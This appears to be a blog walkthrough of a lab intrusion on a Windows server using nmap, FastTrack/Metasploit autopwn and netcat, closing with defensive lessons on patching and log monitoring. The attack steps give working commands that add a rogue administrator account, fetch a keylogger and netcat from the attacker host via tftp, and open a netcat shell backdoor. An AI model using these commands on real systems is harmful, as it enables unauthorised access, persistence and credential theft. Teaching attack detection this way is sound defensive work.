The purpose of this blog entry is to demonstrate how easy it is for an attacker to use freely available tools to exploit servers and gain root (administrative) access. I also look at how this attack might have been spotted from the defenders point of view and what could have been done to prevent it.
Tools
- Backtrack3
- TCPDump
- Nmap
- FastTrack
- Netcat
I'll be using FastTrack as my primary tool to gain root. FastTrack is kind of like a front-end for Metasploit, but it is quite automated and just throws all the exploits at a target and builds a nice database as it goes. So it is very noisy and has a greater chance of crashing the target. Once finished it lists the sessions ready for the attacker to connect to.
The Attack
1. I start up a sniffer to see whats about and I discover a host that may be fun to play with. This was done using TCPdump.
tcpdump -i eth0 -vv
2. On the discovered host I use nmap to verify the open ports and the listening services. I just let nmap use the default port list rather than specifying a range at this time.
nmap 192.168.2.2 -T 4 -sV -P0 -n
3. After loading up FastTrack I select the "External Hackin" option.
4. Next I select "Autopwn Metasploit Automated" & enter the IP of my target.
5. I choose the database type of sqlite3. When prompted to update Metasploit I select "No" because i'm in a lab and i have no internet access. FastTrack goes to work and does it's noisy magic.
6. FastTrack has found 2 vulnerabilities that it has successfully exploited. Using the sessions -l command I can see these listed.
7. I pick a session and use it to connect to the server and I use the "whoami" command to verify that I am logged in as a system account with admin privileges.
8. I now go and add a new user and give the account admin rights using the "net user" and "net localgroup" commands.
net user synjunkie Password123 /add
net localgroup Administrators synjunkie /add
9. If I want a nice GUI I use RDP to connect to the host.
And now i can begin to look around my target and if necessary set up other back doors.
10. And if i want to get my tools onto the box to set the backdoor up or log keystrokes it's no problem. I set up a TFTP Server on my attacking box and use windows built in "tftp" command to pull across some tools.
tftp -i 192.168.2.1 GET klogger.exe
tftp -i 192.168.2.1 GET nc.exe
11. For my backdoor i create a netcat listener and shovel a shell back to whoever connects to it.
nc -p 6666 -L -e cmd.exe
To maintain access I could either use the "reg" command to create a registry entry to auto-start my backdoor at each reboot, or create a batch file and put it in the startup folder.
And on the attackers box I connect to my newly created backdoor.
nc 192.168.2.2 6666
owned!
Detection & Lessons Learned
1. The Server was behind on it's patches. Patching is fundamental to securing a system.
2. The Server had loads of listening services. Were all these services necessary? if not shut them down.
3. A new account was added to an administrator group. The Administrators group should always be closely monitored for unathorised changes.
4. From analysing the logs this attack was very noisy and could have easily have been detected.
Below are screenprints of the ftp and web logs. It is evident from these that an attack has taken place.
More tell-tale logs!
And the screenshot below shows that unauthorised entry has occurred.
However, this is after the attack and the damage could have already been done. Any decent attacker will also modify or delete logs so setting up a syslog server that is hardened is a good idea. Most Admins will set up a syslog server not realising that it needs hardening, as it will be critical to you in the event of an attack and can provide valuable information to help you identify the source of the attack and also help you learn from it to better protect your systems in the future.
So to recap:
> Patch computers regularly
> Analyse logs
> Have policies and procedures to help identify suspicious accounts and activities.
